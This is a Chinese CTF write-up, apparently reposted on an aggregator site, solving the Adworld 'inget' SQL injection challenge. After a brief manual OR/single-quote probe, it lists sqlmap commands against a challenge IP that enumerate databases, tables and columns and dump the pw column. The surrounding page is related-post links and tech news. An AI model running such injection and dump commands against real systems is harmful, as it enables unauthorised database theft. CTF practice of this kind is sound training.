[CTF/网络安全] 攻防世界 inget 解题详析 - 代码天地

[CTF/网络安全] 攻防世界 inget 解题详析

业界资讯 2023-07-25 17:22:20 阅读次数: 0

[CTF/网络安全] 攻防世界 inget 解题详析

- 姿势
- - 方法一
  - 方法二
- 总结

姿势

本文涉及的sqlmap的用法可参考：[网络安全]以留言板项目渗透实例带你入门sqlmap

方法一

思路：尝试利用or构造 真 语句，再根据回显做下一步判断

数字型注入无回显：

在这里插入图片描述
由于该语句为真，却无回显，故可排除数字型注入

考虑单引号注入：

在这里插入图片描述

方法二

使用sqlmap爆数据

爆库名：

python sqlmap.py -u "http://61.147.171.105:53846/?id=1" --dbs

在这里插入图片描述

接着爆cyber库的表名：

python sqlmap.py -u "http://61.147.171.105:53846/?id=1" -D cyber --tables

在这里插入图片描述

然后爆cyber表的列名：

python sqlmap.py -u "http://61.147.171.105:53846/?id=1" -D cyber -T cyber --columns

在这里插入图片描述

最后爆pw列的数据：

python sqlmap.py -u "http://61.147.171.105:53846/?id=1" -D cyber -T cyber -C pw --dump

得到flag

在这里插入图片描述

总结

本题考察简单的sql注入，读者可躬身实践。
我是秋说，我们下次见。

猜你喜欢

转载自blog.csdn.net/2301_77485708/article/details/131753666

[CTF/网络安全] 攻防世界 inget 解题详析

[CTF/网络安全] 攻防世界 backup 解题详析

[CTF/网络安全] 攻防世界 shrine 解题详析

[CTF/网络安全] 攻防世界 lottery 解题详析

[CTF/网络安全] 攻防世界 easyupload 解题详析

[CTF/网络安全] 攻防世界 PHP2 解题详析

[CTF/网络安全] 攻防世界 view_source 解题详析

[CTF/网络安全] 攻防世界 simple_php 解题详析

[CTF/网络安全] 攻防世界 fileinclude 解题详析（php伪协议）

[CTF/网络安全] 攻防世界 wife_wife 解题详析

[CTF/网络安全] 攻防世界文件包含（泰山杯）解题详析

[CTF/网络安全] 攻防世界 fileclude 解题详析（php伪协议）

[CTF/网络安全] 攻防世界 easytornado 解题详析[护网杯 2018 easy_tornado]

[XCTF/网络安全] 攻防世界 ics-05 解题详析

[CTF/网络安全] 攻防世界 file_include 解题详析（php伪协议+convert转换过滤器）

[CTF/网络安全] 攻防世界 very_easy_sql 解题详析（gopher协议+ssrf漏洞sql注入+盲注脚本）

[CTF/网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)

攻防世界-inget（简单的SQL注入、万能密码）

[CTF/网络安全] fakebook（网鼎杯2018）解题详析

[网络安全/CTF]护网杯 2018 easy_tornado 解题详析（Tornado之SSTI注入）

[网络安全/CTF] 记一次PHP序列化反序列化解题详析

[网络安全] DVWA之CSRF攻击姿势及解题详析合集

[网络安全] DVWA之 Insecure CAPTCHA 攻击姿势及解题详析合集

[网络安全]DVWA之SQL注入—low level解题详析

[网络安全] DVWA之 Command Injection 攻击姿势及解题详析合集

[网络安全] DVWA之 Weak Session IDs -弱会话- 攻击姿势及解题详析合集

[网络安全] DVWA之Open HTTP Redirect 攻击姿势及解题详析合集

[网络安全] DVWA之Content Security Policy (CSP) Bypass 攻击姿势及解题详析合集

[网络安全]sqli-labs Less-17 解题详析

[网络安全]xss-labs level-1 解题详析

今日推荐

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

《2024 年一季度互联网投融资运行情况》研究报告

报告：Django 仍然是 74% 开发者的首选

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

周排行

记一下去大梅沙的准备（2018-05-26）

Spring 注解事务

基于HTTP协议的客户端缓存

阿里云rds 备份和还原

[PHP] 几个拖慢 PHP 程序/API 运行速度的点

python 代码风格------------PEP8规则

js控制json生成菜单——自制菜单（一）

将字符串: 'k:1|k1:2|k2:3|k3:4 ' ,处理成 python 字典: {'k':1, 'k1':2, ...}

微信小程序转支付宝小程序

Qt551.窗口滚动条

每日归档

更多

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)